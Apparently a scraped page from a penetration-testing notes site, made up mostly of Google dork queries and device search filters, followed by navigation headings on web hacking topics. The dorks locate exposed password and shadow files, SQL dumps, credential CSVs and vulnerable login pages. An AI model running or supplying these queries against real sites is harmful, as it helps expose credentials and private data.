intext:"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
intext:"#mysql dump" filetype:sql
intext:"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
intext:"A syntax error has occurred" filetype:ihtml
intext:"ASP.NET_SessionId" "data source="
intext:"About Mac OS Personal Web Sharing"
intext:"An illegal character has been found in the statement" -"previous message"
intext:"AutoCreate=TRUE password=*"
intext:"Can't connect to local" intitle:warning
intext:"Certificate Practice Statement" filetype:PDF | DOC
intext:"Certificate Practice Statement" inurl:(PDF | DOC)
intext:"Copyright (c) Tektronix, Inc." "printer status"
intext:"Copyright © Tektronix, Inc." "printer status"
intext:"Emergisoft web applications are a part of our"
intext:"Error Diagnostic Information" intitle:"Error Occurred While"
intext:"Error Message : Error loading required libraries."
intext:"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
intext:"Fatal error: Call to undefined function" -reply -the -next
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Generated   by phpSystem"
intext:"Generated by phpSystem"
intext:"Host Vulnerability Summary Report"
intext:"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
intext:"IMail Server Web Messaging" intitle:login
intext:"Incorrect syntax near"
intext:"Index of" /"chat/logs"
intext:"Index of /network" "last modified"
intext:"Index of /" +.htaccess
intext:"Index of /" +passwd
intext:"Index of /" +password.txt
intext:"Index of /admin"
intext:"Index of /backup"
intext:"Index of /mail"
intext:"Index of /password"
intext:"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
intext:"Microsoft CRM : Unsupported Browser Version"
intext:"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
intext:"Network Host Assessment Report" "Internet Scanner"
intext:"Network Vulnerability   Assessment Report"
intext:"Network Vulnerability Assessment Report"
intext:"Network Vulnerability Assessment Report" 本文来自 pc007.com
intext:"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
intext:"Thank you for your order"   +receipt
intext:"Thank you for your order" +receipt
intext:"Thank you for your purchase" +download
intext:"The following report contains confidential information" vulnerability -search
intext:"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
intext:"phpMyAdmin MySQL-Dump" filetype:txt
intext:"phpMyAdmin" "running on" inurl:"main.php"
intextpassword | passcode)   intextusername | userid | user) filetype:csv
intextpassword | passcode) intextusername | userid | user) filetype:csv
intitle:"index of" +myd size
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" master.passwd 007电脑资讯
intitle:"index of" members OR accounts
intitle:"index of" mysql.conf OR mysql_config
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" spwd
intitle:"index of" user_carts OR user_cart
intitle:"index.of *" admin news.asp configview.asp
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
inurl:admin inurl:userlist Generic userlist files

device:firewall 
device:router 
device:wap 
device:webcam 
device:media 
device:"broadband router" 
device:pbx 
device:printer 
device:switch 
device:storage 
device:specialized 
device:phone 
device:"voip" 
device:"voip phone" 
device:"voip adaptor" 
device:"load balancer" 
device:"print server" 
device:terminal 
device:remote 
device:telecom 
device:power 
device:proxy 
device:pda 
device:bridge

RED Squad [en]

/home/red-squad

hashtagwhoami

Recently Added

hashtagJuly 2024

Support our projects

Is There Life After Death ?

hashtagAfter compromising an infrastructure, web app, what is next ?

Web Hacking

CTFs shortcuts

hashtagFind flag

hashtagWeb Dev

hashtagMozilla Firefox

hashtagHTTP Headers Response

hashtagStabilize Reverse shell

hashtaguse CTRL + C

Audits plan

Exposition Audit - Plan

hashtagReconnaissance

OSINT

hashtag🕵️ OSINT

Website OSINT

Business OSINT

hashtagMethodology

hashtagIP addresses

TOR network

hashtagSearch in the TOR Network

hashtagServices

Vulnerabilities and IOC

hashtagFind Vulnerability Data and Indicators of Compromise

hashtagServices

hashtagIOC

Enumeration

Web Scanners

hashtagnikto

hashtagUsage

Subdomains

hashtagEnumeration

hashtagGoogle

hashtagOnline Tools

hashtagTakeover

hashtagSubjack

HTTP Stuff

403 Bypass

hashtagInstall

hashtagCheck also

HTTP Parameters

hashtagFind Parameters

hashtagArjun

Sessions / Tokens

Cookies

hashtagBrief

hashtagDefine Cookies attributes

hashtagRestrict access to cookies

hashtagDefine where cookies are sent

hashtagCookies prefixes

Attacking JWT

hashtagAim

hashtagFlawed Signature Verification

hashtagAccepting Tokens with No Signature

hashtagBrute-forcing Secret Keys

hashtagHow to

hashtagTools

hashtagJWT Toolkit V2

Injections

LaTex

hashtagWhat is LaTex ?

hashtagInjections

hashtagRead files

hashtagWrite file

hashtagCommand execution

hashtagCross-Site Scripting

hashtagResources

Web Vulnerabilities

CSRF

ClickJacking

Files / Upload

IDOR

Remote Code Execution

Servers / CMS

`whoami`

July 2024

After compromising an infrastructure, web app, what is next ?

Find flag

Web Dev

Mozilla Firefox

HTTP Headers Response

Stabilize Reverse shell

use CTRL + C

Reconnaissance

🕵️ OSINT

Methodology

IP addresses

Search in the TOR Network

Services

Find Vulnerability Data and Indicators of Compromise

Services

IOC

nikto

Usage

Enumeration

Google

Online Tools

Takeover

Subjack

Install

Check also

Find Parameters

Arjun

Brief

Define Cookies attributes

Restrict access to cookies

Define where cookies are sent

Cookies prefixes

Aim

Flawed Signature Verification

Accepting Tokens with No Signature

Brute-forcing Secret Keys

How to

Tools

JWT Toolkit V2

What is LaTex ?

Injections

Read files

Write file

Command execution

Cross-Site Scripting

Resources

CMSMap

No Account

Default Credentials

Bruteforce

Passwords Backtrace disclosure

With Account

Manager - RCE

PoC

Manual

Exploits

Drupal < 8.7.x Authenticated RCE module upload

Drupal < 9.1.x Authenticated RCE Twig templates

If found /node/$NUMBER, the number could be devs or tests pages

Drupal < 8.6.9 - REST Module Remote Code Execution

Check for username disclosure on old versions:

Tools

Drupwn

droopescan

Manual

Information Gathering

Brief

Discovery

Default Passwords

Exploits

SAP_RECON (CVE-2020-6287, CVE-2020-6286)

Enumeration

RCE from Script Console

Resources

Reconnaissance

Endpoints | Manual

MindMap

OWASP TOP 10 API